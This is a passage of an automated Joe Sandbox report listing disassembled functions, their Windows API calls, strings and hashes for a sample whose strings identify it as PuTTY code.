Part of subcall function 00198960: _strlen.LIBCMT ref: 00198970

IsIconic.USER32 ref: 00168387
SetWindowTextW.USER32(00000000,?), ref: 001683A7
SetWindowTextA.USER32(00000000,00000000), ref: 001683C5

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: TextWindow$Iconic_strlen
String ID:
API String ID: 1204891203-0
Opcode ID: 5a04fc8b7a4e435fe898179342271d4070d51df895ac34131e1f467cb9794937
Instruction ID: be42f78553d97d63537b53974a7870a16f31211c0e46a441cc3023b4de3906ba
Opcode Fuzzy Hash: 5a04fc8b7a4e435fe898179342271d4070d51df895ac34131e1f467cb9794937
Instruction Fuzzy Hash: FB01B9B19042007BEB222F20BC4FF7B3664EB51719F0C4024F805921A1DBB2A934E7A6

Uniqueness

Uniqueness Score: -1.00%

Function 001683E0 Relevance: 3.0, APIs: 2, Instructions: 18windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 001683EB
ShowWindow.USER32(00000006), ref: 00168405

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: IconicShowWindow
String ID:
API String ID: 3061500023-0
Opcode ID: a16d59680e70bda406581aa8c16d58f9d90cc3dd7f9a1f8497df3dde2ae3f0e4
Instruction ID: fdb2905b1200f82943d9958c88c841c7a9ee0e98c0bf1be17e316571fca2a962
Opcode Fuzzy Hash: a16d59680e70bda406581aa8c16d58f9d90cc3dd7f9a1f8497df3dde2ae3f0e4
Instruction Fuzzy Hash: 1BD05EA0245241ABEB211734BD5CB677B95FB21301F088120F8C6C3170DF328822F608

Uniqueness

Uniqueness Score: -1.00%

Function 002241A4 Relevance: 1.6, APIs: 1, Instructions: 140timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,0022467A,00000000,00184E79), ref: 00224258

Part of subcall function 0021A16A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0021F669,?,00000000,-00000008), ref: 0021A216

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ByteCharInformationMultiTimeWideZone
String ID:
API String ID: 1123094072-0
Opcode ID: dacf0e90c0873f489f984e88f19236df28d818d96cfb17055215ccd5423ef519
Instruction ID: c068dd834bd57423d16bcaa5b5c772702cafc8ac53fa1ea49e6cbef3b3c962d1
Opcode Fuzzy Hash: dacf0e90c0873f489f984e88f19236df28d818d96cfb17055215ccd5423ef519
Instruction Fuzzy Hash: B141B472920235BBDB14BFE5EC06A5A7F69EF45350F104055FA08AB1A1E7719EB08F90

Uniqueness

Uniqueness Score: -1.00%

Function 001843C0 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0022E938,00000000,00000001,0022E928), ref: 00184405

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: bdfc37d6c773acbe0d84bea5ec6f2e0ec7873d52672d0dbbe69ff7bb3806f2d7
Instruction ID: 5db26e2ceb685b8ff086b7b5e22f9e6a1a6430a6129c4e0135a6fc7fab284e33
Opcode Fuzzy Hash: bdfc37d6c773acbe0d84bea5ec6f2e0ec7873d52672d0dbbe69ff7bb3806f2d7
Instruction Fuzzy Hash: C9018F74B00300ABDA14EB24EC5AB2A77A4AF68B05F444419F5468B291DF71A950CF42

Uniqueness

Uniqueness Score: -1.00%

Function 001DE240 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6188a7af18fabf8764a4f4dbb0d83982c817ea220bbe3281a7be62472a7d26c1
Instruction ID: 809732b8ccb288edb20598b7fe6a660844e33de5dbd83d163be3bbee9e1a96c4
Opcode Fuzzy Hash: 6188a7af18fabf8764a4f4dbb0d83982c817ea220bbe3281a7be62472a7d26c1
Instruction Fuzzy Hash: E751E0B7D083294BC7249E74D4D0766F3D1AF95321F0A8A2DEDD9A7782E6709C148AC0

Uniqueness

Uniqueness Score: -1.00%

Function 00216424 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23ef00faed83dd064fa7727294f86d8b693be24e5b148a9d32cb106539f9ae5
Instruction ID: 37d54c4588163e0b2d4f1dc85301d25eecc2d98b749e9115db89be66237ed5da
Opcode Fuzzy Hash: f23ef00faed83dd064fa7727294f86d8b693be24e5b148a9d32cb106539f9ae5
Instruction Fuzzy Hash: 78F09072A70221ABC736DE5C9A0DBDDB2F8E715B10F114052E602DB251C2E1DE9087C0

Uniqueness

Uniqueness Score: -1.00%

Function 002163E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 339f3a65888f4338242cc9ab9c9d68b1ca37a0928d7820dc1a1f9389cfbade0e
Instruction ID: 701fed6a45930b32acf6d200e325f2ed07a271967b48415bd83de3af835104d6
Opcode Fuzzy Hash: 339f3a65888f4338242cc9ab9c9d68b1ca37a0928d7820dc1a1f9389cfbade0e
Instruction Fuzzy Hash: 8AF03931A21224EBCB26DB4CD809A89B3FCEB58B50F1140A6E501E7251C7B4EE90CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 002163AF Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f38027eb8f64627028ef42fd31d7d4015889d5840a38e1eec7982d23a94132
Instruction ID: e487e79e52ae5abc679746c855e22bbd13c3cc5d137df3ac40d5b00181d4df25
Opcode Fuzzy Hash: 66f38027eb8f64627028ef42fd31d7d4015889d5840a38e1eec7982d23a94132
Instruction Fuzzy Hash: 7FE08C72921238EBCB24DB88C9089CAF3ECEB48F10B51059AB511D3110C2B0DE80CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0019C080 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 267windowlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,DwmGetWindowAttribute), ref: 0019C0B7
GetDC.USER32(00000000), ref: 0019C0C8
GetCurrentObject.GDI32(00000000,00000007), ref: 0019C147
GetObjectA.GDI32(00000000,00000018,00000000), ref: 0019C155
CreateCompatibleDC.GDI32(00000000), ref: 0019C173
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 0019C186
SelectObject.GDI32(00000000,00000000), ref: 0019C1A0
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CC0020), ref: 0019C1C7
GetDIBits.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0019C251
GetLastError.KERNEL32 ref: 0019C25F

Part of subcall function 0019BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,001A9C90,kernel32.dll), ref: 0019BABF

GetLastError.KERNEL32 ref: 0019C2F9

Part of subcall function 0019CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00196C0E,?), ref: 0019CF6B
Part of subcall function 0019CEE0: _strlen.LIBCMT ref: 0019CF76

ReleaseDC.USER32(00000000,?), ref: 0019C3DE
DeleteObject.GDI32(?), ref: 0019C3E8
DeleteObject.GDI32(00000000), ref: 0019C3EF

Strings

SelectObject: %s, xrefs: 0019C38C
CreateCompatibleDC(desktop window dc): %s, xrefs: 0019C32F
BitBlt: %s, xrefs: 0019C3B5
CreateCompatibleBitmap: %s, xrefs: 0019C35E
6, xrefs: 0019C2AD
dwmapi.dll, xrefs: 0019C09B
BM, xrefs: 0019C29B
'%s': unable to open file, xrefs: 0019C3C9
GetDIBits (get data): %s, xrefs: 0019C26F
(, xrefs: 0019C208
DwmGetWindowAttribute, xrefs: 0019C0B1
GetDC(window): %s, xrefs: 0019C30B

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect_strlen
String ID: '%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
API String ID: 422774641-2800384791
Opcode ID: d6e2f6f389ec855897151f0cf59e33f53f622ae3cf9a08979cffe814046aaffe
Instruction ID: da64d8c28ed28cef9a2c982a80e7057101c65b7279911c61c4adc75684b1ad22
Opcode Fuzzy Hash: d6e2f6f389ec855897151f0cf59e33f53f622ae3cf9a08979cffe814046aaffe
Instruction Fuzzy Hash: D491E5B1904300AFE710AF60EC49B5F7AE8FB95745F04082CF989D7291E7B199548BA7

Uniqueness

Uniqueness Score: -1.00%

Function 001D82D0 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 311filememorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 001EF3E0: ___from_strstr_to_strchr.LIBCMT ref: 001EF424
Part of subcall function 001EF3E0: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,40000000,00000000,?,?,?,?,?,001EF5A8,?), ref: 001EF465
Part of subcall function 001EF3E0: GetLastError.KERNEL32(?,?,?,?,?,001EF5A8,?), ref: 001EF46C
Part of subcall function 001EF3E0: WaitNamedPipeA.KERNEL32(?,00000000), ref: 001EF47A
Part of subcall function 001EF3E0: GetLastError.KERNEL32(?,?,?,?,?,001EF5A8,?), ref: 001EF484

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001D8365
CloseHandle.KERNEL32(00000000), ref: 001D840D
FindWindowA.USER32(Pageant,Pageant), ref: 001D845F
GetCurrentThreadId.KERNEL32 ref: 001D846F
LocalAlloc.KERNEL32(00000040,00000014), ref: 001D84AC
ReadFile.KERNEL32(00000000,?,00000400,?,00000000), ref: 001D8524
LocalFree.KERNEL32(00000000), ref: 001D85A2
CreateFileMappingA.KERNEL32(000000FF,?,00000004,00000000,00040000,00000000), ref: 001D85B9
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,00000004,00000000,00040000,00000000), ref: 001D85E8
_strlen.LIBCMT ref: 001D8623
SendMessageA.USER32(00000000,0000004A,00000000,?), ref: 001D8640
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00000000), ref: 001D8690
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001D8697
LocalFree.KERNEL32(?,?,?,?,?,?,00000000), ref: 001D86B3

Strings

PageantRequest%08x, xrefs: 001D8476
Pageant, xrefs: 001D8455, 001D845A

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: File$Local$CloseCreateErrorFreeHandleLastView$AllocCurrentFindMappingMessageNamedPipeReadSendThreadUnmapWaitWindowWrite___from_strstr_to_strchr_strlen
String ID: Pageant$PageantRequest%08x
API String ID: 941082645-270379698
Opcode ID: 19a8275771cd7cbe7d0d55929c6c9a93f0b87450ce4d5f8641881f1ae6eb2f0b
Instruction ID: a617372407a6ed49daac91930f26ed6b8bcf71f7cba900a82e3e9dfbe7767ac0
Opcode Fuzzy Hash: 19a8275771cd7cbe7d0d55929c6c9a93f0b87450ce4d5f8641881f1ae6eb2f0b
Instruction Fuzzy Hash: D4A1A2B1604300ABD720AF24EC45B2BB7E4FF94714F15492DFA49A7391EB74E904CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00166480 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 167windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 001664AC
AppendMenuA.USER32(00000000,00000000,00000400,?), ref: 001664E1
DeleteMenu.USER32(?,00000000), ref: 00166605
DeleteMenu.USER32(00000200,00000000), ref: 00166614
InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00166632
InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00166648
DeleteMenu.USER32(?,00000000), ref: 00166664
DeleteMenu.USER32(00000200,00000000), ref: 00166673
InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00166691
InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 001666A7

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00166515, 0016656E
nesting < 2, xrefs: 00166573
S&pecial Command, xrefs: 00166622, 00166681
IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX, xrefs: 0016651A

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Menu$DeleteInsert$AppendCreatePopup
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
API String ID: 1803796953-2360807388
Opcode ID: e58dd2085b081ca4f056397a4e9a874f20c0b6dbc1e7ad3be2071674f06fb206
Instruction ID: 2868d73b62ee1c6ceecc3fe3fec28baecae48950f0e3e83103c15ff279ea52a1
Opcode Fuzzy Hash: e58dd2085b081ca4f056397a4e9a874f20c0b6dbc1e7ad3be2071674f06fb206
Instruction Fuzzy Hash: B351B1716403086BEB245F15FC4AF26BB96EB84B50F18842DF6059B2E5DBF1BC24DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0019C420 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 0019C456
GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 0019C47C
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0019C4A2
GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 0019C4C8
GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 0019C4EA
GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 0019C508
GetProcAddress.KERNEL32(00000000,SetEntriesInAclA), ref: 0019C52B

Strings

SetSecurityDescriptorOwner, xrefs: 0019C502
GetSecurityInfo, xrefs: 0019C450
OpenProcessToken, xrefs: 0019C49C
SetEntriesInAclA, xrefs: 0019C525
SetSecurityInfo, xrefs: 0019C476
InitializeSecurityDescriptor, xrefs: 0019C4E4
GetTokenInformation, xrefs: 0019C4C2
advapi32.dll, xrefs: 0019C436

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AddressProc
String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
API String ID: 190572456-1260934078
Opcode ID: 58d5150ba7658dfc6a2f2e4f769ae6bd57ce7e74389635a84ee0f1d2abec3fc9
Instruction ID: ebf44581b7e7c58a126e4ae62d1f2552d660525629b542deecf313ebd1e3db64
Opcode Fuzzy Hash: 58d5150ba7658dfc6a2f2e4f769ae6bd57ce7e74389635a84ee0f1d2abec3fc9
Instruction Fuzzy Hash: 1D314A70B10342DAEF15CF36BC7DB2A3AE87705785F058029E842C66B0DBB0EA80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 001C8240 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 189synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 001EF180: _strlen.LIBCMT ref: 001EF196
Part of subcall function 001EF180: _strcat.LIBCMT ref: 001EF1CB

GetLastError.KERNEL32 ref: 001C83DB

Part of subcall function 001C7050: GetUserNameA.ADVAPI32(00000000), ref: 001C7114
Part of subcall function 001C7050: GetUserNameA.ADVAPI32(00000000), ref: 001C7140

Part of subcall function 001EF2E0: CreateMutexA.KERNEL32(?,00000000,?), ref: 001EF34F
Part of subcall function 001EF2E0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 001EF35E
Part of subcall function 001EF2E0: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,001C828B,00000000,?), ref: 001EF391
Part of subcall function 001EF2E0: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,001C828B,00000000,?), ref: 001EF3A0

ReleaseMutex.KERNEL32(00000000), ref: 001C83CC
CloseHandle.KERNEL32(00000000), ref: 001C83D3
ReleaseMutex.KERNEL32(00000000), ref: 001C846D
CloseHandle.KERNEL32(00000000), ref: 001C8474

Part of subcall function 001C7050: GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 001C709E
Part of subcall function 001C7050: ___from_strstr_to_strchr.LIBCMT ref: 001C70EE

Strings

%s: %s, xrefs: 001C830A, 001C836C
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/sharing.c, xrefs: 001C83A7
Unable to call CryptProtectMemory: %s, xrefs: 001C83EB
\\.\pipe\putty-connshare, xrefs: 001C82A1
*logtext || *ds_err || *us_err, xrefs: 001C83AC
%s.%s.%s, xrefs: 001C826C, 001C82A6
Local\putty-connshare-mutex, xrefs: 001C8267

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Mutex$CloseFreeHandleLocalNameReleaseUser$AddressCreateErrorLastObjectProcSingleWait___from_strstr_to_strchr_strcat_strlen
String ID: %s.%s.%s$%s: %s$*logtext || *ds_err || *us_err$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/sharing.c$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
API String ID: 4023102869-438322010
Opcode ID: c1821b9a60ab967125fa617cddb166bfccf97af8175bb5c836b02effb7fc034c
Instruction ID: 8499042115d99f0d48eb93ecd686e006f0fd2daf39bcdbcadc5cf99bbb19c07f
Opcode Fuzzy Hash: c1821b9a60ab967125fa617cddb166bfccf97af8175bb5c836b02effb7fc034c
Instruction Fuzzy Hash: 275145B5904244AFD7016F64EC46E1F76A8BF6A319F090438F90D97253EB32EA54C763

Uniqueness

Uniqueness Score: -1.00%

Function 001C61B0 Relevance: 21.1, APIs: 14, Instructions: 136filesynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C61D9
ReadFile.KERNEL32(?,?,?,?,?,?), ref: 001C6255
EnterCriticalSection.KERNEL32(002633E0), ref: 001C62E7
SetEvent.KERNEL32 ref: 001C630A
LeaveCriticalSection.KERNEL32(002633E0), ref: 001C6315
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C6324
EnterCriticalSection.KERNEL32(002633E0), ref: 001C6339
SetEvent.KERNEL32 ref: 001C635C
LeaveCriticalSection.KERNEL32(002633E0), ref: 001C6367
CloseHandle.KERNEL32(?), ref: 001C6375

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: CriticalSection$Event$EnterLeave$CloseCreateFileHandleObjectReadSingleWait
String ID:
API String ID: 1398713650-0
Opcode ID: d3e1866388ff48cb0b5d03d726d6cd0066bbd6b80c1a3d64de2320d160a3779c
Instruction ID: 9ec25c575a06272391c9c8de41cbe52e18383120728138b20eceed36902beaf0
Opcode Fuzzy Hash: d3e1866388ff48cb0b5d03d726d6cd0066bbd6b80c1a3d64de2320d160a3779c
Instruction Fuzzy Hash: 15516B70604302AFD711CF61E988B5AFFF1FF59755F008619F859862A0CBB1E8A0CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00222189 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 002222A8
___TypeMatch.LIBVCRUNTIME ref: 002223B6
CatchIt.LIBVCRUNTIME ref: 00222407
_UnwindNestedFrames.LIBCMT ref: 00222508
CallUnexpected.LIBVCRUNTIME ref: 00222523

Strings

csm, xrefs: 002222DF
csm, xrefs: 00222233
csm, xrefs: 002221C6
Xg!, xrefs: 00222323, 0022232B

Memory Dump Source

